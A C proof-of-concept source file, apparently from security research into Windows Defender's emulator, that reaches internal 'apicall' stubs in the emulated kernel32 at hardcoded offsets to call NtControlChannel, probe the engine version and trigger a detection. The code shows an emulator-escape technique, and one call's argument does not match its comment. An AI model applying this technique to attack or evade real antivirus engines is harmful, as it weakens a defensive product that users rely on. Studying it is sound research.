#include <Windows.h>

// Build Release x86

/*
These snippets come from the kernel32.dll "vdll" within the emulator, which 
I dumped out and reversed. The IDA disassembly snippets were generated with 
an IDA Processor Module Extension I wrote to add support for the apicall
instruction. 

These offsets are specific to the 2/28/2018 build of mpengine.dll, version 1.1.14600.4
MD5:  FAADDDD3BE6CA763559F5F55B14532FB

The mpam-fe.exe distro was MD5: 2dba714acd66eb28cf93814ac3ac9865
*/

/*
kernel32.dll vdll +0x52004

.text:7C852004                      sub_7C852004    proc near               ; CODE XREF: MpStartProcess+123F p
.text:7C852004                                                              ; MpStartProcess+18FD p ...
.text:7C852004 8B FF                                mov     edi, edi
.text:7C852006 E8 00 00 00 00                       call    $+5
.text:7C85200B 83 C4 04                             add     esp, 4
.text:7C85200E 0F FF F0 FD 9E 9E 93                 apicall ntdll!NtControlChannel
.text:7C852015 C2 08 00                             retn    8
.text:7C852015                      sub_7C852004    endp
*/
VOID NtControlChannel_APICALL()
{
	typedef DWORD(*NTCC)(DWORD, void *);
	HMODULE k32base = LoadLibraryA("kernel32.dll");
	NTCC apicallNTCC = (NTCC)((BYTE*)k32base + 0x52004);
	DWORD VersionNumber;

	// NtControlChannel(0x3, &VersionNumber)
	// When called with information class 0x3, NtControlChannel returns mpengine.dll version,
	// in this case, 14600. Ignore result
	apicallNTCC(0x3, &VersionNumber);

	if (VersionNumber == 14600)
	{
		OutputDebugStringA("Version number matches 14600");

		// NtControlChannel(0x11, "virtut_body_found")
		// As demonstrated by one of Tavis Ormandy's original PoCs for hitting
		// NtControlChannel, doing this will instantly trigger a virus detection,
		// in my testing - "Threat Virus:Win32/Virut.BN!dam"
		apicallNTCC(0x3, "virut_body_found");
	}
}

/*
kernel32.dll vdll +0x16d4e

.text:7C816D4E                      sub_7C816D4E    proc near
.text:7C816D4E 8B FF                                mov     edi, edi
.text:7C816D50 E8 00 00 00 00                       call    $+5
.text:7C816D55 83 C4 04                             add     esp, 4
.text:7C816D58 0F FF F0 BB 14 80 B2                 apicall kernel32!OutputDebugStringA
.text:7C816D5F C2 04 00                             retn    4
.text:7C816D5F                      sub_7C816D4E    endp
*/
VOID OutputDebugStringA_APICALL(PCHAR msg)
{
	typedef void(*ODS)(char *);
	HMODULE k32base = LoadLibraryA("kernel32.dll");
	ODS apicallODS = (ODS)((BYTE*)k32base + 0x16d4e);

	apicallODS(msg);
}

int entrypoint()
{
	/*
	these will only be visible if you have some kind of instrumentation on the OutputDebugStringA
	emulation in the engine. Both will reach mpengine!KERNEL32_DLL_OutputDebugStringA.
	*/
	OutputDebugStringA("OutputDebugStringA the normal way");
	OutputDebugStringA_APICALL("OutputDebugStringA via ret2apicall");

	//call NtControlChannel via apicall - shouldn't be able to do this
	NtControlChannel_APICALL();

	return 0;
}
